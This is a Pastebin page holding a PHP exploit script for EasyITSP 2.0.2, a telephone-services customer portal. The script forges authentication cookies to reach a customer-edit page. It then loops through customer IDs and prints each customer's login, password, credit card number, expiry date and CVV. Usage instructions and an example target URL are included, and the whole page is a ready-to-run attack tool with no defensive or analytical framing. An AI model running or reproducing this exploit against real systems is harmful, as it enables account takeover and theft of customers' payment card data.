SHARE
TWEET

Exploit EasyITSP by Michal Blaszczak-blaszczakm.blogspot.com

a guest Oct 26th, 2012 134 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2. error_reporting(0);
  3. $arguments = getopt("a:b:c:");
  4. $url = $arguments['a'];
  5. $id_pod =$arguments['b'];
  6. $id_end =$arguments['c'];
  7. if(count($arguments)!=3)
  8. {
  9. echo '## Exploit - EasyITSP by Lemens Telephone Systems 2.0.2   '."\n";
  10. echo '## Discovery users with passwords                          '."\n";
  11. echo '##                                                         '."\n";
  12. echo '## Author: Michal Blaszczak                                '."\n";
  13. echo '## Website: blaszczakm.blogspot.com                        '."\n";
  14. echo '## Date: 10.10.2012                                       '."\n";
  15. echo '##                                                         '."\n";
  16. echo '## Greatz: cond, packet, jestemka1pi, sid, chez            '."\n";
  17. echo '##         #pakamera@freenode                             '."\n";
  18. echo '##         (old) #2600@ircnet                             '."\n";
  19. echo '##         (old) #mamo_mamo_jestem_chakerem@ircnet        '."\n";
  20. echo '##                                                        '."\n";
  21. echo '## Usage:                                                 '."\n";
  22. echo '## php exploit.php -a URL -b ID_START -c ID_STOP          '."\n";
  23. echo '##                                                        '."\n";
  24. echo '## Example:                                               '."\n";
  25. echo '## php exploit.php -a http://lemens-ts.com/easyitsp/customer/ -b 5 -c 10'."\n";
  26.  
  27. exit;
  28. }
  29. $url2='customers_edit.php?currentpage=customers';
  30. $url.=$url2;
  31. for ($id_pod; $id_pod <= $id_end; $id_pod++) {
  32. $cookie = 'cust_verify=' . urlencode('#pakamera') . '; cust_id=' . urlencode($id_pod);
  33. $ch = curl_init($url);
  34. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  35. curl_setopt($ch, CURLOPT_HEADER, 1);
  36. curl_setopt($ch, CURLOPT_COOKIE, $cookie);
  37. curl_setopt($ch, CURLOPT_POST, 1);//przesylamy metodÄ… post
  38. curl_setopt($ch, CURLOPT_POSTFIELDS, "customersid=$id_pod"); //dane do wyslania
  39. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  40. $intro = curl_exec($ch);
  41. curl_close($ch);
  42.  
  43. $regex_login = '#\<td title="Customer username for portal"\>(.+?)\<\/td\>#s';
  44. preg_match($regex_login, $intro, $login);
  45.  
  46. $regex_pass = '#\<td title="Customer password for portal"><input type="password" name="password" required="1" maxlength="45" value="(.+?)"\>\<\/td\>#s';
  47. preg_match($regex_pass, $intro, $pass);
  48.  
  49. $regex_ccnum = '#\<td title="Customer cc number"><input type="text" name="ccnumber" maxlength="20" value="(.+?)"\>\<\/td\>#s';
  50. preg_match($regex_ccnum, $intro, $ccnum);
  51.  
  52. $regex_ccexpire = '#\<td title="Customer cc expire"><input type="text" name="ccexpire" maxlength="8" value="(.+?)"\>\<\/td\>#s';
  53. preg_match($regex_ccexpire, $intro, $ccexpire);
  54.  
  55. $regex_cccvv = '#\<td title="Customer credit card CVV"><input type="text" name="cccvv" maxlength="6" value="(.+?)"\>\<\/td\>#s';
  56. preg_match($regex_cccvv, $intro, $cccvv);
  57.  
  58.  
  59.         $test = explode(" ",$login[1]);
  60.  
  61.  
  62.         if(trim($test[0])!='</td>')
  63.         {
  64.         echo 'ID:'.$id_pod."\n";
  65.         echo 'LOGIN:'.$login[1]."\n";
  66.         echo 'Password:'.$pass[1]."\n";
  67.         echo 'CCnumber:'.$ccnum[1]."\n";
  68.         echo 'CCexpire:'.$ccexpire[1]."\n";
  69.         echo 'CCCVV:'.$cccvv[1]."\n\n";
  70.         }
  71. }
  72.  
  73. ?>
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top